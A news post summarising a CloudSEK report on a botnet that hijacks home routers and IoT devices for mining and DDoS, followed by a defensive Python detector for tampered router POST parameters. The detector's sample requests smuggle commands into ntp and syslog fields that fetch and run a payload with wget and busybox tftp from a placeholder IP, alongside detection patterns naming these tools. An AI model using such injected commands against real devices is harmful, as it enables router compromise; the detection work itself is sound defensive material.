NEWS Is Your Router Performing Worse? Check It — Millions of Devices Are Already Mining Cryptocurrency for Hackers

ExcalibuR



This scheme is active right now—in millions of apartments around the world.

Researchers from CloudSEK have reported a large-scale campaign using a Loader-as-a-Service botnet that, over the past six months, has turned home routers and IoT devices into farms for mining and Mirai-like attacks. An analysis of leaked command server logs made it possible to trace the full attack chain—from hacking admin panels to installing multi-architecture binaries and the subsequent use of compromised devices.

The attackers use a combination of methods: passing unsanitized POST parameters (in fields like ntp, syslog, hostname), brute-forcing default passwords, and exploiting vulnerabilities in corporate and CMS systems. Targets included Oracle WebLogic, WordPress, and vBulletin, for which known bugs were used, including CVE-2019-17574, CVE-2019-16759, and CVE-2012-1823. In the corporate segment, attempts were recorded to exploit WebLogic deserialization, Struts2 OGNL injections, and JNDI exploits.

According to CloudSEK, attack intensity increased by 230% in July and August 2025. Multi-architecture executable files from the "Morte" family and JSON-RPC miners, as well as bots with Mirai functionality, were downloaded onto infected devices. Their resources were subsequently used for DDoS campaigns, covert mining, and reselling access.

The exposure of the command panel logs revealed the operators' systematic approach. The [ReplyPageLogin] blocks recorded credential brute-forcing attempts; [ConfigSystemCommand] and [SystemCommand] contained commands for downloading droppers via wget, busybox, and TFTP/FTP chains. The [ReplyErrorPage] and [ReplySuccessPage] tags helped track successful execution or errors, while [ReplyDeviceInfo] collected information about firmware, MAC addresses, and available services. This allowed them to select the most suitable payload package for each device.

The investigation revealed that the primary attack focus was on SOHO routers with vulnerable interfaces like wlwps.htm and wan_dyna.html, as well as on embedded Linux systems, where binary builds like morte.x86 and morte.x86_64 were uploaded. An additional risk is created by the use of HTTP, FTP, and TFTP protocols for payload delivery, making the botnet resilient and flexible.

The campaign's impact is assessed as multi-faceted. For businesses, this poses a risk of data theft, lateral movement within the network, and the spread of secondary threats, including ransomware. For corporate routers, threats include channel overload, time spoofing via NTP, and DNS manipulation.

Small businesses and providers are facing a situation where their infrastructure is turned into a springboard for attacks on larger targets. As a result, organizations are experiencing degraded network performance, increased load on response teams, and the need for constant monitoring of new attack vectors.

CloudSEK advises implementing multi-layered protection: block outgoing HTTP, HTTPS, FTP, and TFTP traffic for IoT segments; isolate devices showing signs of POST parameter tampering; update firmware and passwords; and disable remote administration.

For SOC and SIEM, it is recommended to configure rules for detecting suspicious requests, including the use of wget, curl, or calls via |sh, as well as to monitor anomalous JSON-RPC connections. During incident response, it is necessary to isolate infected devices, collect artifacts like logs and the contents of /tmp, and if an update is not possible, completely re-flash or replace the equipment.

The company predicts the further development of this infrastructure with an expansion of the list of targeted devices and increased complexity of malicious modules. In their assessment, only systematic control and prompt response can mitigate the risks from this new model of a service-based botnet.
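A defender-side check for the POST-parameter tampering and downloader commands the post describes (unsanitized ntp/syslog/hostname fields, wget/curl/busybox/TFTP chains, "|sh"), added here as an example that is not CloudSEK's code nor part of the original post. The sample requests, hosts and file names are constructed for illustration; only the field names, interface names and tool names come from the report.

```python
import re
from urllib.parse import unquote_plus

# Router configuration fields the report names as abused for command injection.
SUSPECT_FIELDS = {"ntp", "syslog", "hostname"}

# Downloader/executor tokens from the report's SIEM guidance, and the shell
# metacharacters an injection needs to break out of a plain hostname/address value.
DOWNLOADER_RE = re.compile(r"\b(wget|curl|busybox|tftp|ftpget)\b", re.IGNORECASE)
SHELL_META_RE = re.compile(r"[;`|&$]")

def parse_form(body: str) -> list[tuple[str, str]]:
    """Decode an application/x-www-form-urlencoded body into (field, value) pairs."""
    pairs = []
    for chunk in body.split("&"):
        if chunk:
            key, _, value = chunk.partition("=")
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs

def find_tampered_params(body: str) -> list[tuple[str, list[str]]]:
    """Return (field, reasons) for each POST parameter that looks injected."""
    findings = []
    for field, value in parse_form(body):
        reasons = []
        if field.lower() in SUSPECT_FIELDS and SHELL_META_RE.search(value):
            reasons.append("shell metacharacters in config field")
        if DOWNLOADER_RE.search(value):
            reasons.append("downloader command in parameter")
        if reasons:
            findings.append((field, reasons))
    return findings

# Constructed sample of router admin POSTs (hypothetical hosts, RFC 5737 addresses).
SAMPLE_REQUESTS = [
    {"src": "192.0.2.10", "uri": "/wan_dyna.html",
     "body": "hostname=home-gw&ntp=pool.ntp.example.org"},
    {"src": "198.51.100.7", "uri": "/wan_dyna.html",
     "body": "ntp=pool.ntp.example.org%3Bwget%20http%3A%2F%2F203.0.113.9%2Fdrop.sh%7Csh"},
    {"src": "198.51.100.7", "uri": "/wlwps.htm",
     "body": "syslog=%60busybox%20tftp%20-g%20-r%20morte.x86%20203.0.113.9%60"},
]

def alerts_for(requests: list[dict]) -> list[str]:
    """One SIEM-style alert line per suspicious request (isolation candidates)."""
    out = []
    for req in requests:
        for field, reasons in find_tampered_params(req["body"]):
            out.append(f"{req['src']} POST {req['uri']} field={field}: {', '.join(reasons)}")
    return out
```

Percent-decoding before matching matters: the metacharacters in the second and third samples arrive encoded and would be missed by a pattern applied to the raw body.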